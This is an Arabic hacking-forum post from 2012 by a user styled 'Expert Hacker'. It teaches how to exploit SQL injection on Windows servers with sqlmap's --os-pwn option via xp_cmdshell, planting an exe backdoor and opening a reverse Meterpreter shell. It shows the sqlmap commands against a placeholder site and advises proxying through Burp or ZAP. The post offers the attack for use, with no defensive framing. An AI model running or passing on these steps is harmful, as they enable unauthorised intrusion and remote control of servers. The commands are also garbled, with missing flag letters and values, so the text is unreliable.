عرض مشاركة واحدة
قديم 12-11-2012, 02:27 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
Cyber Cool
:: Expert Hacker ::
 
الصورة الرمزية Cyber Cool
 

 

 
إحصائية العضو






Cyber Cool غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 13
Cyber Cool is on a distinguished road

افتراضي SQLmap & Metasploit For Meterpreter


بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاتة

اليوم بآذن الله بنعرف في حالة كانت في امكانية لرفع شيل على

السيرفرات ( ويندوز ) وتشغيل بايلود Meterpreter

طبعا هون التجربة على سيرفرات الويندوز بـطريقـة : Xp_cmdShell

وعن طريق باك دور بـ exe طبعا

على السيرفر الفكره وما فيها عبآرة عن آمر واحد

كود PHP:
cd /pentest/database/sqlmap 
كود PHP:
./sqlmap.py -'http://www.site.com/index.php?id=1' --risk=--level=--os-pwn 
يعني في حالت تم الحقن وفية امكانية لرفع باك دور

والاتصال العكسي بالسيرفر بهي الطريقة الي تشوفها

ولازم معظم الاوقات انك تستخدم بروكسي Brubsiute , Zap Proxy

وحفظ النتائج والحقن خلالها كما شرحت في موضوع سابق ْ

امامك والموضوع للمعلومية وبشرح تبين المعلومة آكثر واكثر

كود PHP:
 http://www.gulfup.com/?9HhEAS 
يالله لاتنسوني من صالح دعائكم

اتمنى لكم الفائده

كل ودي في امان الله



SQLmap & Metasploit For Meterpreter

   

رد مع اقتباس